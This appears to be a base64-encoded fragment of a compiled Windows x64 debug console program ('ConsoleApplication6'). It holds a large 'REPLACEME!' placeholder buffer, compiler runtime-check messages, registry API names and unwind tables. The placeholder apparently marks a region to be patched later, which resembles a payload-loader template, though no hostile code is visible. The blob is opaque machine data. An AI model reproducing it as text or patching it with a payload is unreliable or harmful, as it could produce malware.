VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF4RAYABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAG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